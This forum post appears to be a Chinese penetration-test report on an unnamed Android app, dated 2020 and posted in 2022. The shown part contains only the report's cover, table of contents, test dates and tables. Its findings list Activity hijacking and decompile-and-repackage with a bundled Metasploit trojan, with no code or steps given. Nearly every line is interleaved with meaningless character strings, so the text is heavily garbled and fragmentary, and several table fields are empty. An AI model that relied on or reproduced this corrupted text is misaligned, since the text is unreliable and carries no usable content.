找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4645|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
' a- A( _2 x0 C3 {+ @9 @1 N) s7 o . M$ @# ~* A, i6 ^4 \

6 N/ Y# n7 x/ Z% P& V 4 n2 e3 S* R; T2 P4 f$ U, R
( Y; J9 ~5 u$ D0 n 4 y; I" y! {5 P9 N3 A2 b" _

* n. f. ]( C, q4 H 8 R" n* v; r' D: Q# S" p) t
3 [ q) x8 l( }& L' i 8 _% h/ J1 }; @- x' s, j5 K

, w) s2 }( S0 Z9 d. A+ v0 k4 p* Y, V, ^ 文档编号:                7 \( t4 Z1 T+ M, H. ^- F $ n: @" Q9 H; `

( p$ X* ?9 y. J5 S! }' k, m! V/ Q% [6 p2 ?# \! C& S. b* y% ?( I

: B! a; I, c6 z7 m% M7 k+ u$ t3 ?   0 H' S" a, K0 o Z9 k0 @: p7 |, { t+ G6 z u ?/ W( J

0 F3 E9 S& C6 b4 B+ `, X* p9 \

$ v7 g9 ~7 C5 I5 n$ U 0 p, y {' t& v% ^1 i   $ I7 m- [; A9 g3 U+ r% d 6 k a4 x+ N! y3 b

- ]8 G4 m( f7 F% d7 Q. T) {# z6 B5 J g

" u2 F9 R$ r9 m# p5 B. D- O+ E & l4 b5 I3 z' j! F   " d- t9 d0 l+ q& z$ p: B3 p , D7 y! o( ^1 p: y/ g/ z$ U+ ?

. U" O) }! J4 n/ s9 \6 _6 v3 I+ c - [% r Z! `, m! }! p! H: R

1 R) j0 m1 H3 s s% f2 H% `' t% v) M' O P- q# f   $ l8 S3 |/ U" K2 v0 f/ c/ r9 _% H+ B" u3 `" q

7 [( t, T( u3 y' {1 r% l" x 7 N3 K' F! g3 A+ G& Z T, D9 K3 T

7 x& f+ }2 s. ?) d - o2 A4 ^0 N0 s/ u8 e   5 d+ a; Z5 d. ? s9 k! I$ o7 h 4 `" K2 O! ^! a5 {3 u+ {- p

0 V, v" s4 k+ I0 D8 m 5 `7 N- E4 y( l+ @6 U- o

- W0 T3 A, ?; }3 j3 V 9 o: E6 N' W2 X8 J7 [7 O- j3 r 某某某APP渗透测试 ) {, Y1 m- T1 L: M) m: _ + {3 T) N% A' X S

" M# w0 `( X2 @$ P 3 l8 h/ r- T3 V6 U, a1 ^5 a

/ V; v/ Q1 l/ B$ h, m# p( f1 \* [; l) f   7 F( P: l0 |( W: s * B' F8 ?4 e1 n: x0 e \$ |

: e. v& G6 o+ c7 p/ ^ 4 S/ k0 s. F% k9 u- e3 p, q

/ z1 \8 _! h& G5 v * v; o1 U0 R f. y   6 D1 b' p& e* u$ V @, [% b7 v; o ( A; Q1 ~7 Z6 I

" ], [* r6 P- B' J( H' J) D : N4 p: R9 ^6 g0 R2 Q

/ `/ b6 Z3 _6 g' P$ B / x' ^+ T8 j# }0 c   ( a1 r: ?" T. l2 c3 z5 _0 F. q; D* v! T. n

t1 }. J' c/ T 7 F- B# r2 F' [3 G2 r$ x

, F) Z( p" ? d H8 V" y% } r. X6 u+ A8 m3 X8 }   # N5 R. O u( y) I 9 r8 ~6 \$ H/ o. e0 T# E

7 Z; r* E3 W( {- U p" z0 E8 m % R C- I2 R& ^3 E7 h$ u5 U. R

( A: c* F8 `& V/ n3 q3 w 9 b5 o t( l u3 _0 |1 _ 技 术 报 告 8 V% E3 `. z" h& q: E 8 Z3 a; t3 g Y0 n6 ?. @( f

* [& U6 h2 B1 w) W* V5 |, r( q- l & {, y' X% ~; R; X, z

* k7 i2 }. o Y, ^1 M 2 s' \+ m% g& @* I0 P   2 O) C+ A; ]8 u9 L * E9 t- Q& D2 y) X5 q' N7 i+ H$ @2 D

' V3 U; x) G! O! F- A! S' G K( w+ j3 {0 ]# @5 _

! |6 w3 r1 _0 Q. { * H% l, C; D, { d; d) Y   * @" A& T+ A2 Q. r2 G# w" ?, U% O 6 x! M# t m u

! H8 U4 J, ?( `$ U0 s9 T& T* D; \6 A1 \# \6 ]

( E/ M# ?' X8 s) x2 K9 f' l8 S9 A! l5 g1 w   0 F. v/ t3 b/ {) z4 J: Y2 @ " |" V) j/ T5 V0 a

' m/ i7 a2 i2 ^2 V5 k% k8 D 5 @. @8 f d$ l$ ?" G' o' U T4 h

8 |2 d7 ~$ b. z: s% B / z' i. P2 ~; z( T4 ?   : Q& M6 u/ u9 u7 _# h" C$ X+ Z$ B9 S7 h

0 o" I/ N; B5 F1 P( V1 y! n" D M5 O7 Y: ^

& c( O: X1 T) J, K; v* [/ s- p/ p - G# b6 k+ H* n2 N3 P   $ f: T9 H0 o, @: u 9 b8 j1 i7 G d3 d6 O( A

$ l, [- @- j+ L) J2 K2 i2 ]9 W7 {+ j. d+ x

4 g; ~# x; w5 H, y, E3 W1 O3 M( p3 d1 Z, B! W   1 j q8 U6 n/ W# I- w: \. { % g h# g/ [+ w# h

; s& R6 h! B9 e9 e + d0 _: a) S% K

+ a4 k* B6 g) h. r+ E! W: U D# @) i& d: i" [5 O5 i; u   8 q3 g* }' b/ g% E. H2 v 8 }) ~, h8 G% p- B' o4 J

, W, X7 P4 h X4 w1 Z+ P2 l / i* _2 P2 Z% N K" U! B

; H! P- F0 x! z$ y) v8 G* c% b7 M6 y1 k* k1 Q9 |5 z( E3 r   $ K0 [4 G3 J7 p4 n# H' K# Q# g8 w# W) E4 a3 `

6 j- q1 ~' K- P 2 v2 k* E# T& \& H+ Y. i

9 o! Q% X" ?6 i9 i9 C ' ?, v0 k# |$ D9 }) a) G8 n! B   : p1 S! K3 d& @ 7 |; m" f4 H( u- h* B7 Y

: w: C* o% \( d& h; m" U) P) y. C* j7 P9 Y

I0 T# B0 v1 o$ \$ s A3 E* q, p0 R5 M5 I* p. r6 V   " ^% ?+ V- [( s5 h/ _0 ] t. T 0 c/ G y9 S' s

0 J t# }( | z7 I j" s" j( p* b f8 y- W

3 Y# G9 ]( X# E2 X8 f' W: W$ D" G ) i! [ G' [1 i) K   + D8 p* `# a3 S! \9 ? 9 A- L2 j( O' ? O+ L' J; I7 v; y

8 s2 P: n! N" K1 h) z. _# ] 3 {1 h6 j V u$ ?

7 ?9 i- |% n1 B$ w: I. @& o + i. [. v$ T7 ~6 g: G   + e8 U' O+ I, M+ C9 f . x( ]' I6 v' w

8 v- e8 e: W* ~. ]' t 3 ^, V! ^# s& ]2 w3 }

# u1 f% C. J G" s, t / s+ y+ b" a" h. T   : n: K0 _* x8 {/ o1 W" E' w1 K4 Y$ H. \0 E: }) _( |9 r

, [- s: [! C% @& c8 O: r ! C- A9 z( @- I) K* D

# L4 C# q3 d/ q6 ^: K" y8 R! [- F$ \3 O; {- y# n   : X& G# G0 e4 h3 B( F5 l9 c * m* S; Y. b" \$ ?

) d/ S A' x! R% g7 N: d ( C; h0 ~ @& T3 W- {

* u! Q, o! s7 d# K% X' y! w% u" z9 j- e( T6 P   % d" }" b z- \7 v$ C ' ]* n, h9 k# l7 V5 K+ K3 T2 c4 y

. \/ Y' S, J+ N/ l. f1 _' y a( G ( @' n' f. l% ~0 f/ {4 A$ O

' b- v# Q( n9 T: F/ c : Y4 D8 O4 Z( q0 e: d   ! Z$ ^) T t( |) u4 _% K% G 3 ]1 e1 o1 L" y9 B

* B# L! l/ C; h3 I& f* _ 3 d& p+ p' D% B+ z# h) w

1 g+ `5 Y! j+ E; i 0 L3 S3 H# S9 S5 u$ F7 E& f   / ~- O# E k# x; \ 9 J5 [5 Y b3 J' \

9 l1 E3 y b- N, J! a/ p! n* W- }2 q

: A/ Q! m6 `7 x: L# d# J ( t ~* C$ E* }) I; X   * q$ S6 |- R z, b {! M / _7 z) u% V* t; y6 S% o" M

( o' R1 O) ? u. W9 M* H9 j* m - x" `2 k3 l$ ~4 h

8 G/ g+ P3 I; a % @8 D4 F3 h" i' ?3 ^1 _+ z1 e 二〇二〇年 1 ?, v6 i+ A$ x7 _; x8 Q a9 U* e: d, E8 v

: v; q: T9 D+ S7 g# \ 7 J/ G' b) G- g& T7 y1 g
3 g3 R/ E) z! V; Q& m ' R7 d4 N# R( H7 R% N
/ t! X. \3 W3 d! V" s# k; T : F6 H# F5 s9 i& }* T" H- x8 b2 N
. R0 i1 l3 l" z0 R 6 Y' A+ \# f6 w+ U0 M Y' B( Q1 E* j
5 {5 Z" \: i6 Y" U, E+ I6 w ) K% J- B) k" P; J. |. @8 d
- X( E* h- d! O4 G" D8 o: f4 P: f. y) K+ _; r2 B {8 q, M5 E6 ?
# O, X4 Y6 P+ l, N3 t9 L/ _! I + {% _& I* m: b3 L0 }6 }+ C
: U) k' N4 A- ? G3 y8 R- P! i; l
9 M6 x% d/ u0 u 4 j9 p" _3 N; r

. I8 Y* g7 u+ N* s6 K; |% n4 c' {" X7 }8 } 目 录 6 Y+ p# p+ T4 p& X7 x' w% _ E8 ~6 e1 m O

" B) H( m# \( y, F % }2 z0 S, p( X+ W/ }$ X ! x9 o9 y- _7 Y; r! n) k$ P8 x1 r! O9 K3 `" n$ S; l4 P8 x5 @! c

8 |/ ]7 Y3 I0 v1 I8 \# h, {8 u# S$ Q* D4 I   % E* P' ^4 V( t& F# n; b m0 _% z! B9 ]! b% X7 A! Q% Z: [

& r A0 z- d, v6 i9 k $ `% U, ?% J0 E: {# z9 S

f( i* |0 Q& B7 M% k; ^ # d0 [8 |2 R3 X1 M8 X1 ]0 |0 U( R 1 概述... 3 * A n- h- W6 b- Y7 m3 U. w8 O 9 H/ S2 B# l0 C9 ?

. S x: H4 P# O; ?5 z6 ~, H$ h7 [9 c3 q9 f

0 o4 _; ~6 @; y$ l 8 L; s' G. }0 j2 r9 F 1.2测试时间... 3 " `4 J. ~; G7 Y8 m! C& K) j+ J2 G4 I8 Y! `8 a% G! J- Y, L0 m Z- \' L

9 M: Y) q% E, v / O4 F! U0 R8 @. c

; p7 r- ]9 R# l2 H4 [ 8 S$ t. ?: l1 ~3 U4 c9 g$ a 1.3测试对象... 3 & {& U/ _) m1 d h. ]! v8 S W1 p6 y; ?8 @

+ ]. o; h: X6 H* r( |8 F 0 B; r5 L, F7 P' d0 R4 v, ^" X7 G

+ @3 a- k6 t) h1 R" Z, Y 3 }1 n9 S$ Y2 `/ k. g0 z. P, a 1.4测试结果... 3 5 b0 I" Q* t* v, G8 M 1 q9 V3 m. o4 a

$ H5 Z; }5 Y( F( { 5 | k: g/ L5 W$ l: B" X

( _0 l; n7 k0 Y: ~9 e3 [9 y. i$ g 2 检测结果... 4 ' D5 i3 [' q( D; ?) H+ k0 M4 X - |' u0 e! q+ q, m( g9 `

9 ]. z9 i! W, A: I9 c. ]/ n 6 g! x- Z+ j. e/ C0 F

0 |, X# t$ O( D: O+ x& s: l. `. w& s8 O2 W* C 2.1 某某某... 4 1 M# O$ B0 l8 d: F ' b( Y! L" A6 |3 ~- v" X

8 ?2 M7 B: ^( y: ]; N! F 3 p* b6 k9 b( L, p# M; m

) k+ a4 C, F$ [. v! [7 e / U9 n1 U/ |; n ^ 2.1.1检测目标... 4 5 M$ ^# j' E9 l% }. Z, _ w8 x) \9 I1 T

! L. Z1 ]: k$ ]7 |7 I $ ^3 c' X8 Z; y. D

4 m& H; ^ R7 O! d1 Z 8 a( |) L/ S' y( l# A$ | 2.1.2检测结果... 4 " r" n5 ?9 }, l" F h $ D$ T' }8 B5 J! F. w. ?* B4 E1 z

: ]$ a* j2 o" m - w8 d. W7 g4 D& V7 e' \4 Y# [5 u

6 w* e2 u1 x7 p7 x7 r3 Y: i6 A1 s : W `/ [; l! B- d/ d: ? j 2.1.2.1. 4 & \% \) X: Z0 ~0 n5 c2 { J8 X' u: }2 k% Q: y6 U

0 Y' v. _+ p# W7 | 8 B. x8 @. y) N' K' `

+ ~& H) U! f; G: P1 _5 q ! a: O; g$ p3 k) z 2.1.2.2. 6 2 D+ `" g/ Z- u 0 h2 B1 W/ r6 H v

$ W8 B2 L" A( F2 `, [; W1 ]* q+ H3 J' U- K+ |% ?: Q9 L# Z. V

& ^/ `' ]; x& a y 8 @4 l: m8 s/ ^. T* p4 E 1 y t+ S% m6 P+ i G7 [2 B/ _0 I$ K

5 |- r4 B* j8 f5 c. M$ N- m . s; x, C( w( w
: d( U2 R+ U0 X ; X8 m# ^% }7 X5 [, \7 Q' }
7 m2 I+ A$ T& m # r% y0 M/ ~3 T0 X' v: \8 p0 m+ ^
$ _0 F: {1 Z% J; E 9 }2 R; c- z5 ^0 A" B- U d( Z
/ P! F& L4 J( e1 s: k: O9 v- z % a; X7 X4 g* N* ]8 L! X; X

6 o; f+ `7 i7 s4 j( C( K x( e3 ^2 U 1 概述 7 F3 n2 }" ]% ]: N, z; u5 B * y+ H1 O- `+ P5 n, G5 a' o

4 h) y$ O1 a$ J7 `2 u/ u6 u; Q9 X7 k! l, U2 k/ U$ f! e

# h! K7 q; e, Q. E & Q! v' ~3 ?& h6 H$ h* d' N, H 1.2测试时间 3 z8 i0 c, W+ @4 ~9 N% s( ^9 h; v( c & J; x4 _: a+ @) g, x- G) N

" x5 a/ r# P3 i8 ~4 E x) u0 C 7 J. c( d: Q1 x: q+ W- f 5 }: C, _5 N/ P4 V0 n5 t5 {! U' P$ O% v# h& S1 S6 V J: n* J1 B) n- \9 o) X9 t/ ?9 z' O W# b3 L) R" {2 F2 ~: i" Z( b" ~) n2 d+ l" ?- G' w+ P8 |. \7 K! x9 {4 @2 j# V! r/ ~% D4 ?% y7 F1 g' h2 b+ p3 t# g. X" D1 r$ z/ L" B, i6 D4 S2 e" t) j0 s ~7 e6 S! S7 b$ O1 E4 p: N# R+ Q. S: c& F- y5 n& D5 [) O) `* c* ^+ z+ P& S. i) y+ d$ [+ E: q7 P4 Q: j; X9 \. n8 Q; [0 G. a' J5 Y! i+ x9 p: ~' f2 V& O5 K0 Z0 Y3 j- i, e2 t: \5 U) S3 d% `" N0 f2 c6 Y) ~( m7 U h( \: R$ ?1 k# H3 l( |2 R4 W' Q+ C, Q- y) h1 q0 ^- |. Z! X" V$ z+ T Y X3 l0 L. u( p k. |2 G# M+ r$ c' H7 b9 q5 Y6 j' Y4 W9 o5 _: s/ K# n) S% G, l' C! n+ h. r2 z" A* G" m: z. o% T8 N% ? F8 h5 a D1 k8 l: a4 l( `
+ K) k% N6 M K! J3 W4 a# B. i5 k' x7 I" ?/ q8 `

) Z' W+ [2 U" o8 S 2 b4 h) w1 M: M. a7 o7 t 渗透测试时间 # O6 q5 `1 o$ ~+ S8 b& ?& H 5 ]: f, {, a$ r L- R& x9 n

4 E* d! N, L" A: o( e0 W2 @. M+ j/ y# B3 M9 i
1 A- Q" Y( q* [+ M1 o L0 L( ~' [6 w" Y' c! F/ G' B" p4 D

7 W9 @# [3 }5 W1 J8 h+ |; b $ I0 @; s) _6 K7 e6 m/ d7 u 起始时间 6 ?+ H$ K5 A% Z6 I# n; T# E6 U ' H' P ]5 A/ Q) [; a1 R

! a. i# I0 d+ t3 B- {4 T8 C" \ e1 {! w0 ?. r0 \: m. Q
; k+ k- ~8 s& S P, m7 ~" Q% H1 M. b' \3 M8 B8 `% H4 k

8 b+ b; T0 W% Y8 d% c$ T$ N $ o3 y# X9 q3 E 202046 9 B, o9 G6 ^+ v% w - ?# w( m! R. r! u6 `* ^6 w" @1 w

/ U" s9 n8 t; W \* E4 w8 q7 T( U4 \, _7 @3 b, q" [
, R+ b0 t) d; T5 {* }( s$ { 9 L! J/ I& Y' _7 \5 E) O4 F

0 V; j) e: H: P( P0 o9 U8 F9 s , {- M ~- \/ Q' _% B K 结束时间 ; P x+ n" a9 O3 c0 d$ _ 0 k" N% h9 D. B- t1 `8 A; s

# N0 a# e' N2 ]. g- b: G/ @# k' i ( d0 t9 ~) N3 r% }& c! Y0 p: P
+ O1 V" [9 D5 D" F6 d# J Y$ m L; I. V" x7 a

" @ l2 n5 I0 S# [9 Z4 ` 6 S& ]% G) N% L 202049 / I! y f; `& a% T! ?2 b 5 x% P% x8 e' I; k* g- z+ n

- m% w4 `9 ?' u% Q" p - Z7 E$ a) q: g2 @) U
2 d% Z6 @6 {. f8 H% s . u/ h% k2 u; I9 A, o

$ _" T* x( K1 Z* L- |4 O8 t0 x( U( R) D* m J$ k; r 1.3测试对象 1 x, a; ^. g0 e$ I5 R + o. C; g5 ~5 f7 @( r U2 Y

3 l q4 D) p4 a9 l6 f# ^) O& _: m# f) x

B1 @2 q5 Z+ N" x& {6 w 7 E6 b4 f# T# C/ R3 C; a 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: / }$ y$ M0 |2 y" g! w: A& W0 a 9 v; g* j T& G; D: X3 _

$ ?% H) P" E) V8 ?: b4 K# L* @5 I ! E2 r5 U6 o& B) N

" T/ `9 Y) s. V: K+ o ; }; Y) i. y9 H" z6 \ 1-1 检测对象 7 v1 t. I: d7 }6 X) v c5 s5 C- S) N2 [' c* f% b Z, K/ U( F! {

( b! N; R* ^- S A1 { n K( W* e: M5 ?4 t/ Y/ ^3 p0 ` 6 Y% \5 ~) s( Q, P3 }* v9 o) K. k( I2 l! N# |1 V/ }0 y3 u' g& i3 ^& r* K9 C! m* z1 Q8 b, C$ `4 F# _# b3 ~! y" m2 |1 E8 G9 D* F$ l4 u* C, D) E4 p9 j8 n" n1 i; [9 l; t/ f( p- f* a# N- K+ F F% Y/ r3 ~% {0 I$ l. E6 @/ N+ m3 ]- s$ v G3 G6 u1 M* f2 y! p5 e9 Z4 X. i! V: v( }# u# Z3 e: }+ K" {6 a; ]3 E7 i- q- b4 N* b S( e$ n) H' O$ f- `/ d' N% k" h! @. F/ [" o, w& _) L0 G# G$ @* t' F# L5 ] S" p7 ]/ L4 V7 W; M1 H5 r; [. D; X" _$ i5 c! b* s, G( B1 ~% v7 ?( x+ p2 n+ o, h3 I( y2 f9 A2 {; ]9 {/ z+ R: C# o L5 c8 \# O0 a3 K( r: F( }. r7 J. b7 S8 V: p, m& C, V2 n5 ^1 U! X- x- u) ?; ^( n0 \: c/ K7 N3 u* X! e. |3 W. J9 x1 i% x$ }, A! y; M% d8 {$ \- [: R! G" t( p3 U5 E9 w: O; a& B2 I1 T7 M" Q; {4 `5 O5 `1 ~* ^$ U
7 C, g' D! J! v' Q $ s7 W/ w; A3 ^$ |7 U! l

* r Q0 P% ]8 T5 c, F1 ^) E! Z3 \! ?8 h , g1 b4 t/ P# k$ S1 t5 `( d) a5 U 序号 $ s h4 Q, l+ V* I + ?/ `; f& j( s5 e8 U; f2 [

+ N' \0 f6 k- W* [/ i5 c# s/ g/ ] ! [ o. A, P* b! v0 L
+ N1 \4 F B7 f) Z; r: V5 Q " m v ~9 K8 e! M+ p

) i: z* q4 J, Z$ g* p) H* a4 b% {) f# r 测试对象 6 t7 e6 y& f+ J; u4 @: [' y* ^& \: U: S

4 `# [, P+ c( A! Y1 q! Q% ^ 3 ?7 o9 y! R$ v* T/ @
# H! t- X( ]9 O+ f1 u2 v , u% U: D2 c, T% c+ L3 u b

- M7 o/ }0 I2 ] b 3 z: ^2 |; B7 J 测试地址 c. G% r t/ S) O , N& t7 t( A: k3 I. X4 u8 p# z

6 Y1 P5 L2 T$ ~) D/ [- z% j. @( n3 P, c
1 O( ^9 E/ [$ l' l# X% g ! o$ ^) O. c: l! N

8 j. q% B$ X7 |- h" v! J1 C l5 h- L- t1 B/ l2 R; o8 _ 安全漏洞 3 M0 Z; t5 r* [" X * C! n* i$ g! }) o) N$ I

, p$ W2 s3 u! O1 T8 t & k# L4 m1 a7 |
6 |$ x; y3 W6 S1 ?+ w % }2 [( {- Z2 L4 a

p/ |( o' u* b! \7 T& h4 u" L 4 o' T4 q4 W1 D5 W6 ^- T 1 . e5 H& @! D. ^ . T: @3 f w3 S: `- C1 G, s2 [0 G

% v& x3 C, e6 u 1 R4 n5 n! I3 m. _' N+ z; ~
/ | O- w) Y d) y- H0 C2 X7 Q1 y) N9 K! E+ r

- ~: Q3 `* L7 B ^8 I) R " C1 h3 f5 L; w" {* z 某某某安卓APP : `8 i9 G5 A! ?* w6 `$ F' b 3 K) J$ P! A6 W$ n( J& f6 m4 K

3 \& y4 t ?0 c 0 x# ?, O* P/ J: w$ {7 l6 i
4 e: S s* [$ ]; H7 V& j* c 2 a1 [9 P9 ^: u* ^

1 _6 V) K! H$ ~5 e: w ! M3 @: a- ^2 S4 x3 o/ `3 \5 Z8 T   ! ~' ^: z( Q% Q) r3 i ) Y8 k A# ~) o2 @/ m: j# U# L

+ E- b( W8 ~% x$ `7 y2 U$ U- d; n7 W/ K
/ H+ @. F; X, t7 ^; y ' z) i" L. @" }/ V8 G" m! E' U

0 ^( t. t# b" | g- u3 u) S5 r s" P) J/ g; L7 x' O 2 + {& J" H, _0 k& N ; M b) e7 K9 H

* ^- M7 W: ~- r1 k' r- \ ( w: B. K8 t/ \/ c
! l$ Z' ~& N( i8 v+ Y* F & F$ ?: i0 s; o7 w, n$ x; n7 y2 M5 q

2 s2 X) @# C1 ^7 C. ~4 c* j) W( ~* P) k# O% D- n- a 1.4测试结果 . c' A6 }# V. |! S. _" i 6 K# N9 s2 M3 `' K: j% p! V2 j

A0 r; p3 h, K0 J1 B; ~: ` $ ]/ U4 k9 [- ^" s9 o L2 Z- |

' r0 R, [1 ?( z5 i# t) [) i / U/ ~) @3 M( R* }& { 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 5 v2 _8 S! C0 F) u8 C* D% w # F2 @$ {; G/ W7 x# y5 \$ J

8 w: a- X8 a" q9 g, m* p - D, q1 f; B, v0 w# \& I. P9 \

9 d0 ~! ], j8 U) _+ ]" h * X1 O+ l2 x# ?7 v) G   0 y. `% j- i3 E$ P2 Z6 k( r+ d " k7 x' l+ F* N. T, Y6 s: l D; ?7 t x

/ H* [ U) ]! }5 p; e6 n u: A/ T u# p0 [! T- P& Q- f
# L8 z" H# _! g! e) M, {1 P 9 b2 w# m( T9 k' r9 p* z9 Q ! E* m0 |$ W$ `, w0 A2 _' d" i: f- I! L+ c4 a0 Q" l5 V1 d2 P, _; y; j/ ^7 p4 g3 P2 X! H' b' A7 d, ~4 Y. b6 e) R9 Z. t1 J. x9 x3 d& L& [9 [, @ P/ j( m3 }% u' V$ d4 H7 S. B% _& b7 l/ t: r- @; A, I' M3 V. O) c* D8 s, G1 R8 m8 E6 A- ?1 ]2 P1 V# {7 B0 f+ y \$ l5 O* Y4 V. w/ ^' _2 |& }' v+ |! n; d2 F6 x; o& y$ _% c: \+ j) {: d: u* i( ^- e* C9 j2 q- R" h0 Z/ U# m: ^& z% ?. W# X0 h! b+ W. U* I& a: Z3 E& r! Y0 b: m# ]+ B. H j# L1 Z& f" W' T$ @) ]5 J6 j& e2 |: K) w0 y# H( T3 t8 k) g$ d8 i1 j# r% L9 V5 ~, R; e3 ^8 n0 P6 P4 H4 k1 v, ` ?7 c8 {. ?+ w8 c2 J7 p* Y+ P* k/ y" {( ]& B5 M# W8 _& \. l6 u! x. I% r5 v* ~+ B, i. X0 m8 d8 K2 _, N! R, o I0 L7 [4 U4 ?3 d d4 H: p$ E5 T0 K7 ?" ]6 _; k+ I$ M( Y* q6 Q- Z- ~2 @5 T7 `% B; `# u, i" E2 b% A% R+ _: x5 }, P0 O: k, _( \: T8 T* V! `8 y6 R# K4 e9 t0 g3 N: ~: B: Z6 m/ v! ]: j3 ]' Q. t; ~8 X6 M. [% o# g) I* a& g0 I& v( ~% A# n% i" F. B/ R2 d5 W5 H3 n6 m& a8 ?' I9 M4 Y( m/ Q8 I) @3 M; X. }! e2 q" z) g8 \9 V: B7 G" P5 Y; M1 [8 \! e5 n; N- l+ A; T0 S, \% t" k; _3 \0 O' I2 f( n# @# k; b! W! x% x0 _' @0 s5 P: G9 {8 b0 ? W7 s3 l9 n9 q& _2 G! q7 j+ l+ b$ p0 w N; @
3 S% d" A% U' k j1 S, i # {" x+ x& X7 N! F5 Y. y1 W

7 e0 ]& l: n8 Y; D7 O4 N$ S; t# z! D1 @) p: G; W5 L9 C 序号 : h% q: W7 _: d. G5 E ; P" N8 U9 q0 e; |

& W+ O$ ?5 J5 C: U+ f; C7 @ - S! E7 l ~5 |' y4 a2 ~
2 l* i, w! E5 L) d x! Y) f- c& T

9 t* c) c! S' e& E6 b, W4 q: ^7 R: G l, p! D 系统名称 5 P8 \2 ^$ F( P; a6 u7 ` * m) U/ Z" s$ T1 |: D: c: D3 b k

# r+ h4 \, N4 I; R" Y ( x, y- M1 p5 c: W, |
/ k* @: ?( q* V' j1 Y* ~0 Z* Z3 N1 G7 [6 U6 ?- b8 i6 j

5 q. _! y% b# X/ n ( {7 `1 K; l/ A# x# q3 c2 B 漏洞名称 2 n9 L! L6 z: V / f1 J1 A( G4 `. K4 p7 r; x

3 q- B& ~! F) z9 A' _7 V ! g4 l$ G6 g$ v/ `4 S
. n p% W% v Z, z8 D 7 p6 k# j2 ?' Q9 i7 P0 ~$ W# C0 |, Y

) r3 p. F! F t& c X) k n# \4 B- ? ) J3 O/ K r- R7 q$ T5 h. X 漏洞危害 # z; i( m& ~( g: J; a5 j0 T . H& ?( R/ {% a+ g. I

1 C) B: J; K% r0 Q8 F5 M' a ^. P& `' y0 J& f
& [( {' W( R& i1 ?( F$ k: ?) ~% i6 v+ O/ d/ F

. n$ k o1 e4 M" V; v0 j9 g0 P' |: M 修复结果 3 E" l5 T5 [5 N9 B% G: y4 D! {+ l) e. s & ?5 N# T: s1 H `

0 `& T) D3 H3 b9 v* `, R# I9 X$ d9 d# m' D& W
# i( f. M) j) Z) Y, ]# r6 H2 i2 l- V; K5 @3 @

+ o }4 @. z$ d. L0 b6 z' | + K5 h& G9 Q6 Z& M' ^# U. l 1 0 L, |/ b; U9 y+ U( w2 x/ R3 V , a+ y& o9 S- p; H1 ^4 k. ?

4 `! y. J$ a) V' m# z& ^* u1 H3 A# s$ Q8 a6 B& H& _' S9 j
" e h5 D2 a% G7 l, A% C 4 e/ G! S$ M& R. s: ^: W

6 n- E. q" c7 R. c8 D; {) M( W B" i. n( ?: t k6 o 某某某某某某APP # C) f' @3 w+ F8 {- B# h' V" x. _3 C

. b, D! W: B% O2 d# M* N& V4 X" j: V* Y, u: l! r
. | b I+ _, c4 A c$ ` * e! ^, [$ f' P, \; ^# I2 H, ^

8 g, |2 r3 K6 r" c" t # z# W1 `: k8 c Activity 劫持 - [0 v" N) A3 v8 T* L- t4 n% ^1 U T7 ~! b

/ [: A0 Z: _$ u! j) U9 J& l & L2 U6 Z& c' I! T5 n7 @" c

' z! Y5 l. b, m( h% z0 O 6 ?6 u' A- x) |# _' C   ( m$ g. e& A$ {+ d " z4 Q( ]8 f. M, O8 ?0 ^% n

5 P7 K4 ~3 Y# t4 b3 m6 @; m4 F; ~0 q1 r# e* i
! o0 U+ O* P2 B3 ` ( D1 f; R, k/ Z6 U* K

8 h, i( s+ k& b+ ?# c& c7 R' F! U4 F" H & G' p% X/ \* O: {8 G R K9 } & e& W& Y& I* ^. b

% m$ ~; |+ X/ q/ N * @1 I9 `2 }# _4 D1 D
( z& \6 w3 f" x# v: z + ~4 g& W( l8 B& B$ G, U

. k: ^5 O4 Q8 ~7 e. |. `/ H6 t 2 Q% y5 ?( e# ]   % D8 Q& U# {* f ! P! R! a; c5 d1 a9 T

' X& A4 g0 ?+ u# W @ ' M8 J+ w* n, s: E& E+ C7 K6 z$ k
, t1 |' \( w# F& ? & l* k( a, [3 @% B: [( u1 h2 [# G

2 T* d9 Z( x Q ' e W `9 M% [0 P6 ?9 W 2 ) R4 `4 J) t! V4 G7 N) y - }* U! G' }# v2 M5 c* A

& T+ H; N$ X+ }3 G * @; L* `. ]) k/ u! v5 ]/ x
4 B$ J' a9 f) A/ r( y$ G 2 `3 v) e O3 Q3 z6 U. M! [- y9 x1 d" G

8 `* X# s& e: x. k! A* ` - X X( g: t- ]3 [ 某某某某某某APP 1 t: i' O7 r2 q( k% H) t) _/ ]2 b" l8 y0 _% T6 r

: E/ Y2 |; ]. J- i9 q9 t8 E; c. C* y 4 u W' n9 ?: S7 n& R6 o5 ^
/ G6 o7 K( a" s: L0 m ( y4 O3 U$ {. M: \

% B/ C7 y2 N/ `6 U ~ ]2 O4 _0 p' p8 f2 O) D2 b" D 反编译二次打包捆绑木马、篡改APP代码 ; \8 X. H0 t5 O+ h$ W7 q 7 ^4 o u! Y5 ~+ b" G5 o( g

2 X7 a! @; f4 r; s, c ( e0 S; }( o/ ~3 N: P0 _
2 L7 R+ |% I* M- h8 ?. E! q6 N+ s0 W( `

. H. |, B7 k, u9 S 1 f) P1 x& r5 ?8 r# e 9 C, i: i8 N0 ]( |1 [ q6 i' L# |3 @. `6 _

% J* t* t$ V+ x8 ^: K4 m) Q, X7 S: `+ l, z+ Y1 ~8 E4 f* R0 o# U
6 g# T4 o* y" D ' s- o; M9 s8 o

, _8 S4 o) l; ~) X& x* {( \ 4 s% R; q t$ C$ m   * K9 I" R) ?- x( P3 ^ 9 f6 e: s6 o# Q) U9 K8 d% g

& K* i0 J) `1 e, {; c ' O- }" t: u, o
5 E* s+ k0 V7 g2 l. z2 Y0 U7 h* m5 |8 C$ M- H
- g/ |6 L6 K& F( n 6 f+ Y1 E3 ~# Q; Y7 V9 y' Z2 ]

! U* m g5 B8 f* S+ t0 F; }/ q& B) H1 B, q/ d0 S   - t* u) x5 n0 R% ^1 e$ T ! ~9 z8 C" d7 L3 Z1 k5 F' ~) {: u

+ U5 r4 \) ?. E: y + u3 E5 G' T& P6 k! U+ l

